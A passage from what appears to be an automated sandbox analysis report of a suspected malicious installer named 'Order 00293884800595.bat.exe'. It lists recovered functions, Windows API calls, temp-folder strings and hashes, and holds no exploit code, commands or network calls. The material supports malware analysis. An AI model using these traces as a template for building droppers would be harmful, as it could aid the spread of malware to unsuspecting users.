                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                  • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                                  • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                  • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                                  APIs
                                                    • Part of subcall function 6CA512A5: GlobalAlloc.KERNEL32(00000040,6CA512C3,?,6CA5135F,-6CA5504B,6CA511C0,-000000A0), ref: 6CA512AD
                                                  • GlobalFree.KERNEL32(?), ref: 6CA5266E
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA526A8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true
                                                  • Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 51c40de35db1de15a428e282a565c78c4669c6b1a49f52f323f0c3313010891f
                                                  • Instruction ID: 483705b477aa8ef8cdff4da4435621e168ee39bdc45a056d87e32bd519861593
                                                  • Opcode Fuzzy Hash: 51c40de35db1de15a428e282a565c78c4669c6b1a49f52f323f0c3313010891f
                                                  • Instruction Fuzzy Hash: 2D41F271205201EFCB088F54CC88CAF77BAFB86314BD4C62DF54187A51C73898AACB61
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                                  • GetMessagePos.USER32 ref: 00404CA3
                                                  • ScreenToClient.USER32(?,?), ref: 00404CBD
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                  • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                                  • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                  • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E5D
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                                  • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Tahoma
                                                  • API String ID: 3808545654-3580928618
                                                  • Opcode ID: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                                  • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                                  • Opcode Fuzzy Hash: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                                  • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                                  • MulDiv.KERNEL32(0007BE29,00000064,0007BE2D), ref: 00402E90
                                                  • wsprintfA.USER32 ref: 00402EA0
                                                  • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402E9A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                                  • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                                  • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                                  • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA524D7
                                                    • Part of subcall function 6CA512B4: lstrcpynA.KERNEL32(00000000,?,6CA5135F,-6CA5504B,6CA511C0,-000000A0), ref: 6CA512C4
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6CA52452
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6CA52467
                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6CA52478
                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6CA52486
                                                  • GlobalFree.KERNEL32(00000000), ref: 6CA5248D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true
                                                  • Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 3730416702-0
                                                  • Opcode ID: 5a2a21be517b58cd27e4b3d1a0b6edd1411a0864a2181cb1e5e8dec9d2fa442c
                                                  • Instruction ID: e5b944c65f340d948cd53fd5f977f44af39c115410bb4304d0c84a743fce8886
                                                  • Opcode Fuzzy Hash: 5a2a21be517b58cd27e4b3d1a0b6edd1411a0864a2181cb1e5e8dec9d2fa442c
                                                  • Instruction Fuzzy Hash: 2141CFB1608301EFD7148F249848B6A77F8FF41325F94CA2AF546CAA80E774D4E9CB61
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                                  • GlobalFree.KERNEL32(?), ref: 004028C9
                                                  • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                                  • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                                  • Opcode Fuzzy Hash: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                                  • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DA3
                                                  • GetClientRect.USER32(?,?), ref: 00401DF1
                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                                  • DeleteObject.GDI32(00000000), ref: 00401E45
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                                  • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                                  • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                                  • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                                  • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                                  • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                                  • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                                  • wsprintfA.USER32 ref: 00404C1C
                                                  • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                                  • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                                  • Opcode Fuzzy Hash: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                                  • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                                  APIs
                                                    • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,humpende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                                    • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405CC6
                                                    • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                                    • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405D60
                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
                                                  • API String ID: 3248276644-3714600608
                                                  • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                                  • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                                                  • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                                  • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-787714339
                                                  • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                  • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                                                  • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                  • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                                                  APIs
                                                  • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405CC6
                                                  • CharNextA.USER32(00000000), ref: 00405CCB
                                                  • CharNextA.USER32(00000000), ref: 00405CDF
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsf55F0.tmp, xrefs: 00405CB9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
                                                  • API String ID: 3213498283-4121408785
                                                  • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                                  • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                                                  • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                                  • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                                                  APIs
